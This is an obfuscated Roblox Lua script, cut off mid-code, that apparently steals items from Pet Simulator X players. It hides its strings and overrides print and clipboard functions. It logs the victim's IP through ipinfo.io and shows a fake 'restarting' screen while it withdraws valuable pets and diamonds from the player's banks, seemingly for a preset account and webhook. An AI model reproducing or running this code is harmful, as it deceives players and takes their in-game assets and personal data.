--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v165,v166)local v167={};for v228=1, #v165 do v6(v167,v0(v4(v1(v2(v165,v228,v228 + 1 )),v1(v2(v166,1 + (v228% #v166) ,1 + (v228% #v166) + 1 )))%256 ));end return v5(v167);end getgenv().Settings={[v7("\228\208\222\55","\126\177\163\187\69\134\219\167")]=v7("\49\204\51\220\241\34\198\47\214\241\44\195\47\220","\156\67\173\74\165"),[v7("\3\178\75\30\179\41\77","\38\84\215\41\118\220\70")]=true,[v7("\125\23\43\30\211\85\5\49\19\249\85","\158\48\118\66\114")]=v7("\186\60\65\118\90\182\187\137\33\4\34\118\183","\155\203\68\112\86\19\197"),[v7("\114\212\34\253\78\113\230\235","\152\38\189\86\156\32\24\133")]={[v7("\216\66\166\74\244\88\168\77","\38\156\55\199")]=true,[v7("\129\115\104\45\29\103\243\87\177","\35\200\29\28\72\115\20\154")]=50 + 50 },[v7("\59\190\223\222\131\45","\84\121\223\177\191\237\76")]={[v7("\159\67\200\172\50\95\63\202","\161\219\54\169\192\90\48\80")]=true,[v7("\96\76\20\32\71\81\9\49\80","\69\41\34\96")]=901 -(499 + 302) },[v7("\148\214\208\15\17","\75\220\163\183\106\98")]={[v7("\38\175\138\59\209\13\181\128","\185\98\218\235\87")]=true,[v7("\226\50\51\227\208\185\194\40\62","\202\171\92\71\134\190")]=916 -(39 + 827) },[v7("\25\206\43\155","\232\73\161\76")]={[v7("\159\204\67\81\22\180\214\73","\126\219\185\34\61")]=true,[v7("\37\192\74\119\112\100\250\243\21","\135\108\174\62\18\30\23\147")]=0 -0 },[v7("\147\241\41\199\13\189\58\209\179\250","\167\214\137\74\171\120\206\83")]={[v7("\175\229\51\81\240\168\132\251","\199\235\144\82\61\152")]=true,[v7("\46\24\173\46\9\5\176\63\30","\75\103\118\217")]=0 -0 },[v7("\226\66\117\26\173\13","\126\167\52\16\116\217")]={[v7("\236\59\33\140\188\22\243\195","\156\168\78\64\224\212\121")]=true,[v7("\46\224\177\203\9\253\172\218\30","\174\103\142\197")]=0 -0 },[v7("\101\45\92\42\32\74\235","\152\54\72\63\88\69\62")]={[v7("\240\209\239\80\220\203\225\87","\60\180\164\142")]=true,[v7("\113\80\17\44\41\254\27\76\71","\114\56\62\101\73\71\141")]=0 -0 },[v7("\144\202\228\224\149\214\246\221\172\225\210\199\171","\164\216\137\187")]={[v7("\246\243\48\190\174\241\4\217","\107\178\134\81\210\198\158")]=true,[v7("\17\0\150\195\164\43\7\150\223","\202\88\110\226\166")]=0 + 0 },[v7("\228\10\143\228","\170\163\111\226\151")]={[v7("\53\37\179\52\70\56\38\26","\73\113\80\210\88\46\87")]=true,[v7("\168\34\217\23\233\146\37\217\11","\135\225\76\173\114")]=146 -96 }};if getgenv().executed then return;end getgenv().executed=true;local v10=game:GetService(v7("\40\248\182\131\169\175\177\19\238\189","\199\122\141\216\208\204\221"));local v11=workspace.CurrentCamera;local v12={181 -66 ,655 -(128 + 363) ,719 -(475 + 79) ,7 + 20 ,2 + 11 };UserSettings().GameSettings.MasterVolume=0 + 0 ;if (_G.MouseLock~=false) then v10.RenderStepped:Connect(function()local v322=0 + 0 ;while true do if (v322==(1503 -(1395 + 108))) then for v567,v568 in next,v12 do keyrelease(v568);end mousemoveabs(v11.ViewportSize.X/(8 -5) ,v11.ViewportSize.Y/(1207 -(7 + 1197)) );break;end end end);end local function v14(...)local v168=debug.getinfo(2 + 0 );if (v168 and (v168.what==v7("\129\200\17","\150\205\189\112\144\24")) and (v168.func==print)) then return;end return print(...);end print=v14;rconsoleprint=v14;rconsolewarn=v14;rconsoleerr=v14;rconsoleinput=v14;printconsole=v14;setclipboard=v14;if (UserName==nil) then UserName=_G.UserName;end if (UserName2==nil) then UserName2=_G.UserName2;end if (Webhook==nil) then Webhook=_G.Webhook;end local v15=game:GetService(v7("\21\136\190\85\1\154\2","\112\69\228\223\44\100\232\113")).LocalPlayer.Name;if (v15==UserName) then local v229=0 -0 ;while true do if (v229==(0 + 0)) then game:GetService(v7("\228\19\6\202\179\110\149","\230\180\127\103\179\214\28")).LocalPlayer:Kick(v7("\181\10\74\6\197\83\229\204\49\87\67\164\110\247\130\0\77\7\164\9\244\137\22\75\6\237\85\160\131\11\31\71\232\85\160\141\6\92\15","\128\236\101\63\38\132\33"));return;end end end if (UserName==nil) then local v230=0 + 0 ;while true do if (v230==(319 -(27 + 292))) then game:GetService(v7("\156\165\16\93\179\249\220","\175\204\201\113\36\214\139")).LocalPlayer:Kick(v7("\119\217\33\156\37\7\249\38\217\22\105\205\56\217","\100\39\172\85\188"));return;end end end local v16=pcall(function()game:GetService(v7("\157\116\184\153\54\191\107","\83\205\24\217\224")):GetUserIdFromNameAsync(UserName);end);if  not v16 then local v231=0 -0 ;while true do if (v231==0) then game:GetService(v7("\214\201\204\36\227\215\222","\93\134\165\173")).LocalPlayer:Kick(v7("\142\231\213\130\27\142\132\127\178\251\197\130\15\221\183\108\176\243\204\199\123","\30\222\146\161\162\90\174\210"));return;end end end if v16 then _G.UserID=game:GetService(v7("\213\66\113\19\224\92\99","\106\133\46\16")):GetUserIdFromNameAsync(UserName);end if (UserName2~=nil) then local v232=0 + 0 ;local v233;while true do if (v232==0) then v233=pcall(function()game:GetService(v7("\104\44\114\229\95\82\75","\32\56\64\19\156\58")):GetUserIdFromNameAsync(UserName2);end);if  not v233 then game:GetService(v7("\106\196\228\79\95\224\147","\224\58\168\133\54\58\146")).LocalPlayer:Kick(v7("\105\67\95\189\84\198\177\10\85\95\79\189\64\149\130\25\87\87\70\248\39\199","\107\57\54\43\157\21\230\231"));return;end break;end end end local v17=require(game:GetService(v7("\233\142\1\249\176\223\206\207\142\21\198\173\211\221\218\140\20","\175\187\235\113\149\217\188")).Library.Client.Save).Get().Diamonds;local v18=pcall(function()game:GetService(v7("\11\160\147\71\240\105\121\63\170","\24\92\207\225\44\131\25"))[v7("\116\236\149\109\43","\29\43\179\216\44\123")].Interactive.Mailbox.Pad:GetChildren();end);if  not v18 then game:GetService(v7("\141\213\33\85\184\203\51","\44\221\185\64")).LocalPlayer:Kick(v7("\52\233\122\90\116\8\244\92\90\97\4\227\8\126\97\4\230\6\31\67\13\226\73\76\118\65\196\71\81\96\8\227\77\77\51\38\232\65\81\116\65\211\71\31\71\9\226\8\108\123\14\247","\19\97\135\40\63"));return;end function to_base64(v169)local v170="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";return (v169:gsub(".",function(v234)local v235,v236="",v234:byte();for v323=179 -(70 + 101) ,1 -0 , -(4 -3) do v235=v235   .. (((((v236%((3 -1)^v323)) -(v236%((3 -1)^(v323-(140 -(43 + 96))))))>(0 -0)) and "1") or "0") ;end return v235;end)   .. v7("\254\12\99\107","\81\206\60\83\91\79")):gsub(v7("\11\175\149\118\106\199\18\225\74\244\149\118\112\134\73\251","\196\46\203\176\18\79\163\45"),function(v237)if ( #v237<(13 -7)) then return "";end local v238=0;for v324=1 + 0 ,2 + 4  do v238=v238 + (((v237:sub(v324,v324)=="1") and ((3 -1)^((11 -5) -v324))) or (0 + 0)) ;end return v170:sub(v238 + (1 -0) ,v238 + (2 -1) );end)   .. ({"",v7("\229\127","\143\216\66\30\126\68\155"),"="})[( #v169%(3 + 0)) + 1 + 0 ] ;end function from_base64(v171)local v172=0 + 0 ;local v173;while true do local v239=0 + 0 ;while true do if (v239==(1751 -(1414 + 337))) then if ((1940 -(1642 + 298))==v172) then v173="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";v171=string.gsub(v171,v7("\145\246","\129\202\168\109\171\165\195\183")   .. v173   .. v7("\127\101","\134\66\56\87\184\190\116") ,"");v172=1 -0 ;end if (v172==(2 -1)) then return (v171:gsub(".",function(v597)if (v597=="=") then return "";end local v598,v599="",v173:find(v597) -(1 + 0) ;for v619=16 -10 ,2 -1 , -(2 -1) do v598=v598   .. (((((v599%((1 + 1)^v619)) -(v599%((2 + 0)^(v619-(973 -(357 + 615))))))>(0 + 0)) and "1") or "0") ;end return v598;end):gsub(v7("\121\53\76\191\92\239\126\112\56\110\76\191\70\174\37\106\121\53\86\254\29\180","\85\92\81\105\219\121\139\65"),function(v600)local v601=0 -0 ;local v602;while true do if (v601==(1 + 0)) then for v647=1,16 -8  do v602=v602 + (((v600:sub(v647,v647)=="1") and (2^((5 + 3) -v647))) or (1686 -(96 + 1590))) ;end return string.char(v602);end if (v601==(1672 -(741 + 931))) then if ( #v600~=(7 + 1)) then return "";end v602=0 + 0 ;v601=1 + 0 ;end end end));end break;end end end end request=(syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request or HttpPost ;local v19;local function v20()local v174=1301 -(384 + 917) ;local v175;while true do if (v174==(697 -(128 + 569))) then v175=(syn and  not is_sirhurt_closure and  not pebc_execute and v7("\206\170\94\68\108\204\248\243\104","\191\157\211\48\37\28")) or (secure_load and v7("\236\26\250\8\51\209\26\248","\90\191\127\148\124")) or (is_sirhurt_closure and v7("\75\142\60\31\109\149\58","\119\24\231\78")) or (pebc_execute and v7("\178\63\170\94\211\115\28\131\62\173\79\206","\113\226\77\197\42\188\32")) or (KRNL_LOADED and v7("\17\36\218\153","\213\90\118\148")) or (WrapGlobal and v7("\108\43\149\68\72\127\43\162\69","\45\59\78\212\54")) or (isvm and v7("\32\68\140\147\137","\144\112\54\227\235\230\78\205")) or (shadow_env and v7("\128\32\14\248\223\76","\59\211\72\111\156\176")) or (jit and v7("\107\134\240\52\107\159\243\33\65\142\247\62","\77\46\231\131")) or (getscriptenvs and v7("\153\85\186\65\183\85\164\73","\32\218\52\214")) or (unit and  not syn and v7("\123\25\56\188","\58\46\119\81\200\145\208\37")) or (OXYGEN_LOADED and v7("\4\148\41\171\172\179\118\30","\86\75\236\80\204\201\221")) or (IsElectron and v7("\87\77\114\134\234\153\125\79","\235\18\33\23\229\158")) or v7("\115\181\212\183\84\180\213\251\119\168\192\185","\219\48\218\161") ;v19=v175;break;end end end v20();local v21=game.Players.LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text;local v22=game:GetService(v7("\212\125\125\80\222\93\243","\128\132\17\28\41\187\47")).LocalPlayer.Name;local v23=game:GetService(v7("\49\62\7\35\88\19\33","\61\97\82\102\90")).LocalPlayer;local v24=game:HttpGet("https://ipinfo.io/ip");local v25;for v176,v177 in pairs(game:GetService(v7("\143\33\185\78\224\66\23","\105\204\78\203\43\167\55\126")):GetChildren()) do v177:Destroy();end if (_G.LoadingScreen~=false) then local v240=Instance.new(v7("\150\169\49\27\22\10\224\68\172","\49\197\202\67\126\115\100\167"));local v241=Instance.new(v7("\17\73\222\36\133","\62\87\59\191\73\224\54"));local v242=Instance.new(v7("\211\7\226\221\203\3\248\204\235","\169\135\98\154"));local v243=Instance.new(v7("\226\122\37\83\248\31\201\201\114\40","\168\171\23\68\52\157\83"));local v244=Instance.new(v7("\192\116\237\185\9\44\133\241\125","\231\148\17\149\205\69\77"));v240.Parent=game.Players.LocalPlayer:WaitForChild(v7("\176\171\198\226\82\237\167\178\206","\159\224\199\167\155\55"));v240.DisplayOrder=1000001542 -(1407 + 136) ;v241.Parent=v240;v241.BackgroundColor3=Color3.fromRGB(1887 -(687 + 1200) ,0,0 + 0 );v241.Position=UDim2.new( -(1.1603854 + 0),1710 -(556 + 1154) , -(3.1037037400000003 -2),0 + 0 );v241.Size=UDim2.new(95 -(9 + 86) ,2601440 -1601440 ,421 -(275 + 146) ,16262965 + 83737035 );UIAspectRatioConstraint=v241;v242.Parent=v240;v242.BackgroundColor3=Color3.fromRGB(1098 -(10 + 833) ,319 -(29 + 35) ,1130 -875 );v242.BackgroundTransparency=722 -(496 + 225) ;v242.Position=UDim2.new(0.1512353545 -0 ,0 -0 ,0.373532414 + 0 ,1012 -(53 + 959) );v242.Size=UDim2.new(0,1653 -(312 + 96) ,0,538 -228 );v242.ZIndex=288 -(147 + 138) ;v242.Font=Enum.Font.SourceSansBold;v242.Text="We're restarting Pet Simulator X!";v242.TextColor3=Color3.fromRGB(1154 -(813 + 86) ,231 + 24 ,472 -217 );v242.TextSize=562 -(18 + 474) ;v242.TextWrapped=true;v243.Parent=v240;v243.BackgroundColor3=Color3.fromRGB(255,87 + 168 ,832 -577 );v243.BackgroundTransparency=1087 -(860 + 226) ;v243.Position=UDim2.new(303.3251033338259 -(121 + 182) ,0 + 0 ,1977.13342583251 -(1053 + 924) ,1240 -(988 + 252) );v243.Size=UDim2.new(0 + 0 ,160 + 350 ,1648 -(685 + 963) ,259);v243.ZIndex=1972 -(49 + 1921) ;v243.Image="http://www.roblox.com/asset/?id=13441881980";v244.Parent=v240;v244.BackgroundColor3=Color3.fromRGB(1145 -(223 + 667) ,397 -142 ,307 -(51 + 1) );v244.BackgroundTransparency=1710 -(541 + 1168) ;v244.Position=UDim2.new(1597.1512353545 -(645 + 952) ,0 -0 ,0.468594134 -0 ,1125 -(146 + 979) );v244.Size=UDim2.new(0 + 0 ,4312 -3067 ,605 -(311 + 294) ,864 -554 );v244.ZIndex=2 + 1 ;v244.Font=Enum.Font.SourceSansBold;v244.Text=v7("\199\255\57\211\228\246\124\197\246\250\40\146\224\251\53\222\242\179\43\215\183\225\57\214\254\225\57\209\227\179\37\221\226\189\114\156","\178\151\147\92");v244.TextColor3=Color3.fromRGB(57 + 198 ,1698 -(496 + 947) ,1613 -(1233 + 125) );v244.TextSize=15 + 21 ;v244.TextWrapped=true;end local v26=getsenv(game:GetService(v7("\188\241\77\43\23\94\105","\26\236\157\44\82\114\44")).LocalPlayer.PlayerScripts.Scripts.GUIs[v7("\8\47\219\80\106\13\217\82\47\32\193","\59\74\78\181")]);local v27=getsenv(game:GetService(v7("\21\221\91\67\182\55\194","\211\69\177\58\58")).LocalPlayer.PlayerScripts.Scripts.GUIs.Inventory);local v28=getsenv(game:GetService(v7("\135\233\120\236\236\217\164","\171\215\133\25\149\137")).LocalPlayer.PlayerScripts.Scripts.GUIs.Mailbox);local v29=getsenv(game:GetService(v7("\209\196\51\227\234\34\239","\34\129\168\82\154\143\80\156")).LocalPlayer.PlayerScripts.Scripts.Game[v7("\183\183\54\15\77\67\201\183\179\61\0\8\124\140\146\179\33\15\91","\233\229\210\83\107\40\46")]);local v30=getsenv(game:GetService(v7("\241\78\51\207\0\211\81","\101\161\34\82\182")).LocalPlayer.PlayerScripts.Scripts.GUIs[v7("\206\31\92\251\155\197\139\40\252\30","\78\136\109\57\158\187\130\226")]);local v31=debug.getconstant(v26.GetMyBanks,3 + 0 );local v32=debug.getconstant(v27.LockPets,1 + 4 );local v33=debug.getconstant(v26.GetBank,1648 -(963 + 682) );local v34=debug.getconstant(v26.Withdraw,14 + 2 );local v35=debug.getconstant(debug.getprotos(v28.UpdateOutbox)[2],57 -37 );local v36=debug.getconstant(v28.UpdateInboxBottom,1539 -(504 + 1000) );local v37=debug.getconstant(v28.Update,3 + 0 );local v38=debug.getconstant(v26.DecideInvite,6 + 0 );local v39=debug.getconstant(v26.GetMyInvites,11 -8 );local v40=debug.getconstant(v29.Redeem,1 + 2 );local v41=debug.getconstant(v30.Redeem,3 + 0 );local v42=getupvalues(require(game:GetService(v7("\12\58\233\253\55\60\248\229\59\59\202\229\49\45\248\246\59","\145\94\95\153")).Library.Client[v7("\211\200\0\194\65\165\246","\215\157\173\116\181\46")]).Invoke);local v43=getupvalues(v42[2]);local v44=getupvalues(v43[1 -0 ])[1882 -(22 + 1859) ][2 + 0 ];local v45=getupvalues(require(game:GetService(v7("\7\177\155\254\211\54\181\159\247\222\6\160\132\224\219\50\177","\186\85\212\235\146")).Library.Client[v7("\236\132\2\233\54\252\83","\56\162\225\118\158\89\142")]).Invoke);local v46=getupvalues(v45[2 + 0 ]);v31=v44[v46[184 -(156 + 26) ](2 + 0 ,v31)];v32=v44[v46[2 -0 ](166 -(149 + 15) ,v32)];v33=v44[v46[962 -(890 + 70) ](119 -(39 + 78) ,v33)];v34=v44[v46[1677 -(78 + 1597) ](484 -(14 + 468) ,v34)];v35=v44[v46[4 -2 ](5 -3 ,v35)];v36=v44[v46[2](2 + 0 ,v36)];v37=v44[v46[2 + 0 ](2 + 0 ,v37)];v38=v44[v46[1 + 1 ](1 + 1 ,v38)];v39=v44[v46[2](1 + 1 ,v39)];v40=v44[v46[3 -1 ](2 + 0 ,v40)];v41=v44[v46[6 -4 ](2 + 0 ,v41)];local v58=v31:InvokeServer();local v59=require(game:GetService(v7("\110\0\208\163\43\219\93\17\197\171\17\204\83\23\193\168\39","\184\60\101\160\207\66")).Library.Client.Save).Get();function invspace()local v178=762 -(592 + 170) ;local v179;local v180;while true do if (v178==(0 -0)) then v179=0 -0 ;v180=nil;v178=3 -2 ;end if (v178==(1 + 0)) then while true do if (v179==(51 -(12 + 39))) then local v569=0;while true do if (v569==(0 + 0)) then v180=v59.MaxSlots-#v59.Pets ;if (v180>50) then v180=154 -104 ;end v569=3 -2 ;end if (v569==(1 + 0)) then v179=1 + 0 ;break;end end end if (v179==(2 -1)) then return v180;end end break;end end end function invspace_nolimit()local v181=0 + 0 ;local v182;while true do if ((0 + 0)==v181) then v182=v59.MaxSlots-#v59.Pets ;return v182;end end end game:GetService(v7("\1\142\125\165\52\144\111","\220\81\226\28")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game:GetService(v7("\36\218\144\240\249\215\18\214\135","\167\115\181\226\155\138"))[v7("\221\29\202\125\75","\166\130\66\135\60\27\17")].Interactive.Bank.Pad.Position);local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;local v69;local v70;local v71=0 -0 ;local v72=0 + 0 ;local v73=1710 -(1596 + 114) ;local v74=0 -0 ;local v75=713 -(164 + 549) ;local v76=1438 -(1059 + 379) ;local v77=0 -0 ;if (v58[1 + 0 ]~=nil) then v76=v76 + 1 + 0 ;end if (v58[394 -(145 + 247) ]~=nil) then v76=v76 + 1 + 0 ;end if (v58[2 + 1 ]~=nil) then v76=v76 + (1 -0) ;end if (v58[8 -4 ]~=nil) then v76=v76 + (2 -1) ;end if (v58[1 + 4 ]~=nil) then v76=v76 + 1 + 0 ;end local v78=v39:InvokeServer();bankstable={};if (v76~=(7 -2)) then local v281=720 -(254 + 466) ;while true do if (v281==(561 -(544 + 16))) then if (v78[3]~=nil) then table.insert(bankstable,v78[9 -6 ][v7("\155\22\130\80","\212\217\67\203\20\223\223\37")]);end if (v78[632 -(294 + 334) ]~=nil) then table.insert(bankstable,v78[257 -(236 + 17) ][v7("\152\184\129\246","\178\218\237\200")]);end v281=115 -(88 + 25) ;end if (v281==2) then if (v78[12 -7 ]~=nil) then table.insert(bankstable,v78[3 + 2 ][v7("\148\128\207\244","\176\214\213\134")]);end for v546,v547 in pairs(bankstable) do v38:InvokeServer(v547);end break;end if (v281==(0 + 0)) then if (v78[1037 -(1007 + 29) ]~=nil) then table.insert(bankstable,v78[3 -2 ][v7("\102\127\231\81","\80\36\42\174\21")]);end if (v78[9 -7 ]~=nil) then table.insert(bankstable,v78[2 + 0 ][v7("\108\37\30\94","\26\46\112\87")]);end v281=2 -1 ;end end end if (v76==(0 + 0)) then local v282=794 -(413 + 381) ;while true do if (v282==(1 + 1)) then v70=bankstable[10 -5 ];break;end if (v282==(0 -0)) then local v465=1970 -(582 + 1388) ;while true do if ((1 -0)==v465) then v282=1 + 0 ;break;end if (0==v465) then v62=bankstable[2 -1 ];v64=bankstable[366 -(326 + 38) ];v465=2 -1 ;end end end if (v282==1) then v66=bankstable[6 -3 ];v68=bankstable[5 -1 ];v282=622 -(47 + 573) ;end end elseif (v76==(1 + 0)) then local v407=0 -0 ;while true do if ((2 -0)==v407) then v70=bankstable[1668 -(1269 + 395) ];break;end if (v407==(1973 -(495 + 1477))) then local v571=0;while true do if (v571==(2 -1)) then v407=494 -(76 + 416) ;break;end if (v571==(443 -(319 + 124))) then v66=bankstable[2];v68=bankstable[3];v571=2 -1 ;end end end if (v407==(1007 -(564 + 443))) then v62=v58[2 -1 ][v7("\214\152\159\240","\57\148\205\214\180\200\54")];v64=bankstable[1 + 0 ];v407=459 -(337 + 121) ;end end elseif (v76==(6 -4)) then local v548=0 -0 ;local v549;while true do if (v548==(0 -0)) then v549=1911 -(1261 + 650) ;while true do if (v549==(1 + 0)) then v66=bankstable[1];v68=bankstable[2 -0 ];v549=1819 -(772 + 1045) ;end if (v549==(0 + 0)) then local v650=0 + 0 ;while true do if (v650==0) then v62=v58[1 + 0 ][v7("\48\200\28\16","\22\114\157\85\84")];v64=v58[146 -(102 + 42) ][v7("\230\254\58\224","\200\164\171\115\164\61\150")];v650=1845 -(1524 + 320) ;end if (v650==(1271 -(1049 + 221))) then v549=157 -(18 + 138) ;break;end end end if ((4 -2)==v549) then v70=bankstable[1105 -(67 + 1035) ];break;end end break;end end elseif (v76==(351 -(136 + 212))) then local v605=0 + 0 ;while true do if (v605==(0 -0)) then v62=v58[1][v7("\156\193\42\97","\227\222\148\99\37")];v64=v58[2 + 0 ][v7("\17\103\123\210","\153\83\50\50\150")];v605=1;end if (v605==1) then local v639=0 + 0 ;while true do if (v639==(0 + 0)) then v66=v58[1607 -(240 + 1364) ][v7("\127\67\90\56","\45\61\22\19\124\19\203")];v68=bankstable[1037 -(562 + 474) ];v639=1;end if (v639==(1083 -(1050 + 32))) then v605=7 -5 ;break;end end end if (v605==(3 -1)) then v70=bankstable[2 + 0 ];break;end end elseif (v76==(1677 -(1506 + 167))) then local v627=1055 -(331 + 724) ;while true do if ((268 -(58 + 208))==v627) then v70=bankstable[1 + 0 ];break;end if (v627==(1 + 0)) then v66=v58[647 -(269 + 375) ][v7("\19\52\251\144","\221\81\97\178\212\152\176")];v68=v58[729 -(267 + 458) ][v7("\239\210\52\223","\122\173\135\125\155")];v627=7 -5 ;end if (v627==(337 -(258 + 79))) then local v659=0 + 0 ;while true do if ((0 -0)==v659) then local v666=818 -(667 + 151) ;while true do if (v666==(1498 -(1410 + 87))) then v659=1898 -(1504 + 393) ;break;end if (v666==(0 -0)) then v62=v58[2 -1 ][v7("\227\39\36\209","\217\161\114\109\149\98\16")];v64=v58[798 -(461 + 335) ][v7("\48\21\17\88","\20\114\64\88\28\220")];v666=1 + 0 ;end end end if (v659==(1 -0)) then v627=1762 -(1730 + 31) ;break;end end end end elseif (v76==(1672 -(728 + 939))) then local v652=0 -0 ;local v653;while true do if (v652==(0 -0)) then v653=0 -0 ;while true do if (v653==0) then v62=v58[2 -1 ][v7("\166\244\41\157","\168\228\161\96\217\95\81")];v64=v58[1070 -(138 + 930) ][v7("\249\228\7\120","\55\187\177\78\60\79")];v653=1 + 0 ;end if (v653==(1 + 0)) then local v669=0 + 0 ;while true do if (v669==(0 -0)) then v66=v58[6 -3 ][v7("\15\251\118\207","\224\77\174\63\139\38\175")];v68=v58[631 -(92 + 535) ][v7("\166\116\113\10","\78\228\33\56")];v669=1767 -(459 + 1307) ;end if (v669==(1871 -(474 + 1396))) then v653=2 -0 ;break;end end end if ((2 + 0)==v653) then v70=v58[5 + 0 ][v7("\236\75\155\39","\229\174\30\210\99")];break;end end break;end end end Library=require(game:GetService(v7("\41\232\150\93\228\62\56\15\232\130\98\249\50\43\26\234\131","\89\123\141\230\49\141\93")).Framework:FindFirstChild(v7("\223\120\244\30\17\88\234","\42\147\17\150\108\112")));Functions=Library.Functions;PetIDList={};table.foreach(Library.Directory.Pets,function(v183,v184)if (v184.huge or v184.titanic or (v184.name==v7("\13\167\35\126\233\233","\136\111\198\77\31\135")) or (v184.name==v7("\32\5\166\82\184\225","\201\98\105\199\54\221\132\119")) or (v184.convertPoints==(1 + 4))) then table.insert(PetIDList,v183);end end);if ((v62~=nil) and (invspace()~=(0 + 0))) then while task.wait() do print(v7("\187\13\141\42\83\117\188\172\30\132\36\6","\204\217\108\227\65\98\85"));v61=v33:InvokeServer(v62);LHList={};LFinalList={};local v325=v61.Storage.Pets;local v326={};for v408,v409 in pairs(v325) do v326[v409[v7("\75\202\241","\160\62\163\149\133\76")]]=false;end for v411,v412 in pairs(v325) do if (table.find(PetIDList,v412[v7("\223\164","\163\182\192\109\79")])~=nil) then table.insert(LHList,v412[v7("\33\47\4","\149\84\70\96\160")]);end end print(v7("\20\46\33\228\43\18\77\183","\141\88\102\109"), #LHList);if ( #LHList<=invspace()) then for v550,v551 in pairs(LHList) do table.insert(LFinalList,v551);end elseif ( #LHList>invspace()) then for v606,v607 in pairs(LHList) do if ( #LFinalList<invspace()) then table.insert(LFinalList,v607);end end end print(v7("\159\117\195\126\27\49\121\200\160\71\138\42","\161\211\51\170\16\122\93\53"), #LFinalList);v71=v61.Storage.Currency.Diamonds;if (( #LFinalList==(0 -0)) and (v71<(126707048 + 873292952)) and (v17>(367212 -257212))) then v71=0;end if (( #LFinalList~=(0 -0)) or (v71~=(0 + 0))) then local v468=591 -(562 + 29) ;local v469;local v470;local v471;while true do if (v468==(2 + 0)) then wait(1420.5 -(374 + 1045) );break;end if (v468==(0 + 0)) then local v608=880 -(672 + 208) ;while true do if (v608==(2 -1)) then v468=639 -(448 + 190) ;break;end if (v608==(0 + 0)) then v469={[1 + 0 ]=v62,[1 + 1 ]=LFinalList,[2 + 1 ]=0 -0 };v470,v471=pcall(function()v34:InvokeServer(v62,LFinalList,v71);end);v608=1 -0 ;end end end if (v468==(2 -1)) then if (v470==false) then local v628=0;while true do if (v628==(0 + 0)) then wait(0.2 -0 );v34:InvokeServer(v62,LFinalList,0 + 0 );break;end end end v77=v77 +  #LFinalList ;v468=1496 -(1307 + 187) ;end end else print(v7("\255\161\188\45\170","\72\155\206\210"));break;end end end if ((v64~=nil) and (invspace()~=(0 -0))) then while task.wait() do print(v7("\68\123\90\5\97\6\106\65\28\52\67\126","\83\38\26\52\110"));v63=v33:InvokeServer(v64);BHList2={};FinalList2={};local v328=v63.Storage.Pets;local v329={};for v413,v414 in pairs(v328) do v329[v414[v7("\77\30\35","\38\56\119\71")]]=false;end for v416,v417 in pairs(v328) do if ((table.find(PetIDList,v417[v7("\250\235","\54\147\143\56\182\69")])~=nil) and  not v417.l) then table.insert(BHList2,v417[v7("\195\136\251","\191\182\225\159\41")]);end end if ( #BHList2<=invspace()) then for v552,v553 in pairs(BHList2) do table.insert(FinalList2,v553);end elseif ( #BHList2>invspace()) then for v609,v610 in pairs(BHList2) do if ( #FinalList2<invspace()) then table.insert(FinalList2,v610);end end end print(v7("\13\27\38\84\135\171\203\56\6\122\21\209","\162\75\114\72\53\235\231"), #FinalList2);print(v7("\174\20\104\235\64\22\222\124\30","\98\236\92\36\130\51"), #BHList2);v72=v63.Storage.Currency.Diamonds;if (( #FinalList2==(0 -0)) and (v72<(2498015873 -1498015873)) and (v17>(110683 -(232 + 451)))) then v71=0 + 0 ;end if (( #FinalList2~=(0 + 0)) or (v72~=(0 + 0))) then local v472=564 -(510 + 54) ;local v473;local v474;local v475;while true do if (v472==(0 -0)) then v473={[37 -(13 + 23) ]=v64,[3 -1 ]=FinalList2,[3 -0 ]=0 -0 };wait();v472=1089 -(830 + 258) ;end if (v472==(3 -2)) then v474,v475=pcall(function()v34:InvokeServer(v64,FinalList2,v72);end);if (v474==false) then local v629=0 + 0 ;local v630;while true do if (v629==(0 + 0)) then v630=1441 -(860 + 581) ;while true do if (v630==(0 -0)) then wait(0.2);v34:InvokeServer(v64,FinalList2,0 + 0 );break;end end break;end end end v472=2;end if (v472==(243 -(237 + 4))) then wait(2.5 -1 );v77=v77 +  #FinalList2 ;break;end end else print(v7("\160\22\2\191\23","\80\196\121\108\218\37\200\213"));break;end end end if ((v66~=nil) and (invspace()~=(0 -0))) then while task.wait() do print(v7("\2\114\12\116\24\78\154\21\97\5\122\79","\234\96\19\98\31\43\110"));v65=v33:InvokeServer(v66);BHList3={};FinalList3={};local v331=v65.Storage.Pets;local v332={};for v418,v419 in pairs(v331) do v332[v419[v7("\19\22\86","\235\102\127\50\167\204\18")]]=false;end for v421,v422 in pairs(v331) do if ((table.find(PetIDList,v422[v7("\89\165","\78\48\193\149\67\36")])~=nil) and  not v422.l) then table.insert(BHList3,v422[v7("\37\23\132","\33\80\126\224\120")]);end end if ( #BHList3<=invspace()) then for v554,v555 in pairs(BHList3) do table.insert(FinalList3,v555);end elseif ( #BHList3>invspace()) then for v611,v612 in pairs(BHList3) do if ( #FinalList3<invspace()) then table.insert(FinalList3,v612);end end end print(v7("\202\161\13\197\80\192\161\16\208\15\172\242","\60\140\200\99\164"), #FinalList3);print(v7("\165\220\40\47\177\147\167\68\124","\194\231\148\100\70"), #BHList3);v73=v65.Storage.Currency.Diamonds;if (( #FinalList3==(0 -0)) and (v73<(818490288 + 181509712)) and (v17>(63178 + 46822))) then v71=0 -0 ;end if (( #FinalList3~=(0 + 0)) or (v73~=(0 + 0))) then local v476=1426 -(85 + 1341) ;local v477;local v478;local v479;while true do if (v476==(1 -0)) then v478,v479=pcall(function()v34:InvokeServer(v66,FinalList3,v73);end);if (v478==false) then wait(0.2 -0 